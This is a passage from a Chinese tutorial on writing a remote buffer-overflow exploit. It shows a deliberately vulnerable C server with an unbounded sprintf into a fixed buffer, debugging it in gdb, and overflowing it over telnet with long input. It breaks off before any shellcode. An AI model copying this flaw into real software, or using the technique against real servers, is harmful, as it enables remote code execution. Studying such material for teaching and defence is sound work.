怎样写远程缓冲区溢出漏洞利用程序
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
怎样写远程缓冲区溢出漏洞利用程序
作者:佚名出处:IT 专家网论坛整理 2007-12-18 10:29
假设有一个有漏洞的服务器程序(vulnerable.c). 然后写一个 exploit 来 利用该漏洞,这样将能得到一个远程 shell。 一、理解有漏洞程序:
#include #include #include #define BUFFER_SIZE 1024 #define NAME_SIZE 2048 int handling(int c) { char buffer[BUFFER_SIZE], name[NAME_SIZE]; int bytes; strcpy(buffer, "My name is: "); bytes = send(c, buffer, strlen(buffer), 0); if (bytes == -1) return -1; bytes = recv(c, name, sizeof(name), 0); if (bytes == -1) return -1; name[bytes - 1] = ’\0’; sprintf(buffer, "Hello %s, nice to meet you!\r\n", name); bytes = send(c, buffer, strlen(buffer), 0); if (bytes == -1) return -1; return 0; } int main(int argc, char *argv[]) { int s, c, cli_size; struct sockaddr_in srv, cli; if (argc != 2) { fprintf(stderr, "usage: %s port\n", argv[0]); return 1; }
s = socket(AF_INET, SOCK_STREAM, 0); if (s == -1) { perror("socket() failed"); return 2; } srv.sin_addr.s_addr = INADDR_ANY; srv.sin_port = htons( (unsigned short int) atol(argv[1])); srv.sin_family = AF_INET; if (bind(s, &srv, sizeof(srv)) == -1) { perror("bind() failed"); return 3; } if (listen(s, 3) == -1) { perror("listen() failed"); return 4; } for(;;) { c = accept(s, &cli, &cli_size); if (c == -1) { perror("accept() failed"); return 5; } printf("client from %s", inet_ntoa(cli.sin_addr)); if (handling(c) == -1) fprintf(stderr, "%s: handling() failed", argv[0]); close(c); } return 0; }
下面将编译并运行该程序:
user@linux:~/ > gcc vulnerable.c -o vulnerable user@linux:~/ > ./vulnerable 8080 ../vulnerable 8080 说明你能在 8080 端口运行该项服务 user@linux~/ > gdb vulnerable GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under certain con ditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for det ails. This GDB was configured as "i386-suse-linux"... (gdb) run 8080 Starting program: /home/user/directory/vulnerable 8080
现在该程序监听 8080 端口并等待连接。
user@linux:~/ > telnet localhost 8080 Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is ’^]’. My name is: Robin , nice to meet you! Connection closed by foreign host. user@linux:~/ >
看来没有什么破绽,但是这时 gdb 会在屏幕上显示: client from 127.0.0.1 0xbffff28c (访地址因不同机器类型而异) 二、令有漏洞程序发生缓冲区溢出 重新连上该服务,为 "My name is:..." 命令行提供超过 1024 个字节长 的输入:
user@linux:~/ > telnet localhost 8080 Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is ’^]’. My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA